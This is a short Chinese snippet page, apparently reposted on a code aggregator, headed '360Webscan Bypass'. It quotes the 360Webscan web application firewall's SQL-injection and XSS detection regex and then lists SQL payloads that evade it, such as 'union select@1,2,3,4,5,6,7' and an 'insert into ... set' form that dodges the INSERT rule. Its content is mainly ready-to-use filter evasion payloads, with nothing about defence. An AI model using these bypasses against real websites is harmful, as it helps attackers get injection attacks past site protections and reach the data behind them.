首页 > 代码库 > 360Webscan Bypass
360Webscan Bypass
来到select正则:
?
1 | \<.+javascript:window\[.{1}\\x|<.*=(&#\d+?;?)+?>|<.*(data|src)=data:text\/html.*>|\b(alert\(|confirm\(|expression\(|prompt\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\()|<[a-z]+?\b[^>]*?\bon([a-z]{4,})\s*?=|^\+\/v(8|9)|\b(and|or)\b\s*?([\(\)‘"\d]+?=[\(\)‘"\d]+?|[\(\)‘"a-zA-Z]+?=[\(\)‘"a-zA-Z]+?|>|<|\s+?[\w]+?\s+?\bin\b\s*?\(|\blike\b\s+?["‘])|\/\*.*\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT@{0,2}(\(.+\)|\s+?.+?|(`|‘|").*?(`|‘|"))|UPDATE@{0,2}(\(.+\)|\s+?.+?|(`|‘|").*?(`|‘|"))SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE)@{0,2}(\(.+\)|\s+?.+?\s+?|(`|‘|").*?(`|‘|"))FROM(\(.+\)|\s+?.+?|(`|‘|").*?(`|‘|"))|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)|\/\*.*?\*\/|‘ |
Bypass:
union select@1,2,3,4,5,6,7
union select@1=@1,2,3,4,5,6,7
insert正则部分:
?
1 | INSERT\s+INTO.+?(VALUES|SET) |
Bypass:
insert into t set cmd=123
360Webscan Bypass
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。